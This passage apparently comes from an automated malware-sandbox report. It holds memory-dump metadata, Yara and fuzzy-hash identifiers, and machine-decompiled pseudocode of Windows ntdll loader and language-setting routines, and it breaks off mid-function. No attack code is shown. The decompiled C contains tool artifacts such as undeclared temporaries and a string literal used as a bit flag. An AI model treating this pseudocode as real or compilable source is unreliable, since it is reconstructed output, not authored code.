Host: , xrefs: 00416D7A, 00416D92, 00416D80
: , xrefs: 00416D7D, 00416D81
Unknown, xrefs: 00416D05, 00416D08
, xrefs: 00416D6B, 00416D6E

Memory Dump Source

Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $: $: $Host$Host: $Unknown
API String ID: 0-3527920956
Opcode ID: c89c686980f7eeb1925ce282541595de24a89ff96f5f67bb685b01c6bcff3b65
Instruction ID: 944afdcdccf46707a009b214d5038d72688a15774cbc245a584524b340340fc0
Opcode Fuzzy Hash: c89c686980f7eeb1925ce282541595de24a89ff96f5f67bb685b01c6bcff3b65
Instruction Fuzzy Hash: E431C2B6900208AAD710DF88CC82FEBB768EF89304F04456AFD189B245D775A644C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 00F23D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00F23D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00F21B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00F21B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00F21B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00F21B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00F21B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00F34620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00F5F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00F61370(_t276, 0xef4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00F5BB40(0,  &_v68, _t170);
									if(L00F243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00F5BB40(_t257,  &_v68, _t243);
								if(L00F243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00F61370(_t278, 0xef4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00F34620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00F5F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00F61370(_v16, 0xef4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00F5BB40(_t262,  &_v68, _t244);
								if(L00F243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00F61370(_t282, 0xef4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00F5BB40(_t262,  &_v68, _t201);
							if(L00F243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00F34620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00F5F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00F61370(_t280, 0xef4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00F5BB40(_t267,  &_v68, _t245);
							if(L00F243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00F61370(_t284, 0xef4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00F5BB40(_t267,  &_v68, _t224);
						if(L00F243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00f23d3c
0x00f23d42
0x00f23d44
0x00f23d46
0x00f23d49
0x00f23d4c
0x00f23d4f
0x00f23d52
0x00f23d55
0x00f23d58
0x00f23d5b
0x00f23d5f
0x00f23d61
0x00f23d66
0x00f78213
0x00f78218
0x00f24085
0x00f24088
0x00f2408e
0x00f24094
0x00f2409a
0x00f240a0
0x00f240a6
0x00f240a9
0x00f240af
0x00f240b6
0x00f240bd
0x00f240bd
0x00f23d83
0x00f7821f
0x00f78229
0x00f78238
0x00f78238
0x00f7823d
0x00f7823d
0x00f23da0
0x00f23daf
0x00f23db5
0x00f23dba
0x00f23dba
0x00f23dd4
0x00f23e94
0x00f23eab
0x00f23f6d
0x00f23f84
0x00f2406b
0x00f2406b
0x00f2406e
0x00f2406e
0x00f24070
0x00f24074
0x00f78351
0x00f78351
0x00f2407a
0x00f2407f
0x00f7835d
0x00f78370
0x00f78377
0x00f78379
0x00f7837c
0x00f7837c
0x00f7835d
0x00000000
0x00f2407f
0x00f23f8a
0x00f23f8d
0x00f23f90
0x00f23f95
0x00f7830d
0x00f7830f
0x00f23f9b
0x00f23fac
0x00f23fae
0x00f23fb1
0x00f23fb1
0x00f23fb6
0x00f78317
0x00f7831a
0x00000000
0x00f23fbc
0x00f23fc1
0x00f23fc9
0x00f23fd7
0x00f23fda
0x00f23fdd
0x00f24021
0x00f24021
0x00f24029
0x00f24030
0x00f24044
0x00f24046
0x00f24046
0x00f24044
0x00f24049
0x00f78327
0x00f78334
0x00f78339
0x00f7833c
0x00f2404f
0x00f2404f
0x00f2404f
0x00f24051
0x00f24056
0x00f24063
0x00f24063
0x00f24068
0x00000000
0x00f24068
0x00f23fdf
0x00f23fe2
0x00f23fe4
0x00f23fe7
0x00f23fef
0x00f24003
0x00f24005
0x00f24005
0x00f2400c
0x00f24013
0x00f24016
0x00f24017
0x00f2401b
0x00f2401e
0x00000000
0x00f2401e
0x00f23fb6
0x00f23eb1
0x00f23eb4
0x00f23eb7
0x00f23ebc
0x00f782a9
0x00f782ab
0x00f23ec2
0x00f23ed3
0x00f23ed5
0x00f23ed8
0x00f23ed8
0x00f23edd
0x00f782b3
0x00f782b6
0x00000000
0x00f23ee3
0x00f23ee8
0x00f23eed
0x00f23ef0
0x00f23ef3
0x00f23f02
0x00f23f05
0x00f23f08
0x00f782c0
0x00f782c3
0x00f782c5
0x00f782c8
0x00f782d0
0x00f782e4
0x00f782e6
0x00f782e6
0x00f782ed
0x00f782f4
0x00f782f7
0x00f782f8
0x00f782fc
0x00f782ff
0x00f782ff
0x00f23f0e
0x00f23f11
0x00f23f16
0x00f23f1d
0x00f23f31
0x00f78307
0x00f78307
0x00f23f31
0x00f23f39
0x00f23f48
0x00f23f4d
0x00f23f50
0x00f23f50
0x00f23f53
0x00f23f58
0x00f23f65
0x00f23f65
0x00f23f6a
0x00000000
0x00f23f6a
0x00f23edd
0x00f23dda
0x00f23ddd
0x00f23de0
0x00f23de5
0x00f78245
0x00f23deb
0x00f23df7
0x00f23dfc
0x00f23dfe
0x00f23e01
0x00f23e01
0x00f23e06
0x00f7824d
0x00f7824f
0x00f78254
0x00000000
0x00f23e0c
0x00f23e11
0x00f23e16
0x00f23e19
0x00f23e29
0x00f23e2c
0x00f23e2f
0x00f7825c
0x00f7825f
0x00f78261
0x00f78264
0x00f7826c
0x00f78280
0x00f78282
0x00f78282
0x00f78289
0x00f78290
0x00f78293
0x00f78294
0x00f78298
0x00f7829b
0x00f7829b
0x00f23e35
0x00f23e38
0x00f23e3d
0x00f23e44
0x00f23e58
0x00f782a3
0x00f782a3
0x00f23e58
0x00f23e60
0x00f23e6f
0x00f23e74
0x00f23e77
0x00f23e77
0x00f23e7a
0x00f23e7f
0x00f23e8c
0x00f23e8c
0x00f23e91
0x00000000
0x00f23e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 00F23D8C
Kernel-MUI-Language-Disallowed, xrefs: 00F23E97
Kernel-MUI-Language-SKU, xrefs: 00F23F70
WindowsExcludedProcs, xrefs: 00F23D6F
Kernel-MUI-Language-Allowed, xrefs: 00F23DC0

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
Instruction ID: 3a0b2f4843530aab9b9e7ff2c804b63564518bd42e251d16d80dee3018f2d8ca
Opcode Fuzzy Hash: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
Instruction Fuzzy Hash: 69F1A1B2D00628EFCB11DF98D981AEEBBB9FF48750F14006AE905E7251D7749E05EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F28794, Relevance: 5.3, Strings: 4, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F28794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00F2934A() != 0) {
								_t159 = E00F9A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1005780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00F95510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1005780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00F2849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00F28999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00F28999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1005c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1005c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00F32280(_t92, 0x10086cc);
															_t94 = E00FE9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00F461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1005c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00F28A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1005c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1005c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00F5F380(_t136, 0xef1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00F32280(_t108, 0x10086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00F461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00FE9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00F2FFB0(_t118, _t156, 0x10086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00F59A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00f28799
0x00f2879d
0x00f287a1
0x00f287a3
0x00f287a8
0x00f287c3
0x00f287c3
0x00f287c8
0x00f287d1
0x00f287d4
0x00f287d8
0x00f287e5
0x00f287ec
0x00f79bfe
0x00f79c00
0x00f79c02
0x00f79c08
0x00f79c0d
0x00f79c0f
0x00f79c14
0x00f79c2d
0x00f79c32
0x00f79c37
0x00f79c3a
0x00f79c3c
0x00f79c42
0x00f79c42
0x00f79c3c
0x00f79c02
0x00f287da
0x00f287df
0x00f287e3
0x00000000
0x00000000
0x00f287e3
0x00f287f2
0x00000000
0x00f287fb
0x00f287fd
0x00f287fe
0x00f2880e
0x00f2880f
0x00f28810
0x00f28814
0x00f2881a
0x00f2881c
0x00f2881f
0x00f28821
0x00f28822
0x00f28824
0x00f28826
0x00f2882c
0x00f2882e
0x00f79c48
0x00f79c48
0x00f28834
0x00f28834
0x00f28837
0x00000000
0x00000000
0x00f28837
0x00f2882e
0x00f2883d
0x00f28840
0x00f28843
0x00f28846
0x00f28849
0x00f2884c
0x00f2884e
0x00f28850
0x00f28852
0x00f28854
0x00f28857
0x00f288b4
0x00f288b6
0x00f288b6
0x00f28859
0x00f28859
0x00f28859
0x00f28861
0x00f28866
0x00f2886a
0x00f2893d
0x00f28941
0x00000000
0x00f28947
0x00f28947
0x00f2894a
0x00f2894c
0x00000000
0x00f28952
0x00f28955
0x00f2895a
0x00f2895d
0x00f2895d
0x00f2895f
0x00f28961
0x00f28961
0x00f28968
0x00000000
0x00000000
0x00f2896a
0x00f2896b
0x00f2896e
0x00000000
0x00f28970
0x00f28970
0x00f28970
0x00f28970
0x00f28972
0x00f28972
0x00f28974
0x00000000
0x00f2897a
0x00f2897a
0x00f2897d
0x00000000
0x00f28983
0x00f79c65
0x00f79c6d
0x00f79c72
0x00f79c75
0x00f79c75
0x00f79c82
0x00f79c86
0x00f79c87
0x00f79c88
0x00f79c89
0x00f79c8c
0x00f79c90
0x00f79c95
0x00f79c97
0x00f79ca0
0x00f79ca3
0x00f79ca9
0x00f79ca9
0x00000000
0x00f79ca9
0x00f79ca3
0x00000000
0x00f79c97
0x00f2897d
0x00000000
0x00f28974
0x00f28988
0x00f28992
0x00f28996
0x00000000
0x00f28996
0x00f2894c
0x00000000
0x00f28870
0x00f2887b
0x00f2887d
0x00f2887f
0x00f28881
0x00f28884
0x00f28884
0x00f28886
0x00f28889
0x00f2888c
0x00f2888e
0x00f28891
0x00f28891
0x00f28898
0x00000000
0x00000000
0x00f2889a
0x00f2889b
0x00f2889e
0x00000000
0x00000000
0x00f288a0
0x00f288a8
0x00f288b0
0x00f288b2
0x00f288d3
0x00f288d5
0x00000000
0x00f288d7
0x00f288db
0x00f288dc
0x00f288e0
0x00f288e8
0x00f288ee
0x00f288f0
0x00f288f3
0x00f288fc
0x00f28901
0x00f28906
0x00f2890c
0x00f2890c
0x00f2890f
0x00f28916
0x00f28917
0x00f28918
0x00f28919
0x00f2891a
0x00f2891f
0x00f28921
0x00f79c52
0x00f79c55
0x00f79c5b
0x00f79cac
0x00f79cc0
0x00f79cc0
0x00f79c55
0x00f28927
0x00f28927
0x00f2892f
0x00f28933
0x00000000
0x00f288f5
0x00f288f5
0x00000000
0x00f288f7
0x00f288f7
0x00f288fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00f288fa
0x00f288f5
0x00f288f3
0x00000000
0x00f288d5
0x00000000
0x00f288b2
0x00f288c9
0x00000000
0x00f288c9
0x00f2887f
0x00f2886a
0x00f28857
0x00f28852
0x00f288bf
0x00f288bf
0x00f287aa
0x00f287ad
0x00f287ae
0x00f287b4
0x00f287b5
0x00f287b6
0x00f287b8
0x00f287bd
0x00f287c1
0x00f287f4
0x00f287fa
0x00000000
0x00000000
0x00000000
0x00f287c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 00F79C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00F79C18
RegLoadRegistryInfo, xrefs: 00F2879B
LdrpDoPostSnapWork, xrefs: 00F79C1E

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$RegLoadRegistryInfo$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-709946665
Opcode ID: 678638e7af483d212b85f3445204ace9aae47c1b3df7eba433891c028360dece
Instruction ID: ed29fd98bcf789f42a4283fceab46ceec51eab50f45ebed67d6b64b21c5aa863
Opcode Fuzzy Hash: 678638e7af483d212b85f3445204ace9aae47c1b3df7eba433891c028360dece
Instruction Fuzzy Hash: EB912531E0122ADFDF18DF58E881ABA73B5FF54360F548069E845AB241DB70ED42EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F27E41, Relevance: 5.2, Strings: 4, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00F27E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00F2CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | "RegLoadRegistryInfo";
					_t124 = E00F1C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1005780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00F95510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1005780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & "RegLoadRegistryInfo") != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00F37D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00F37D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00F97016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00F37D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00F37D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00F97016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00F4A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
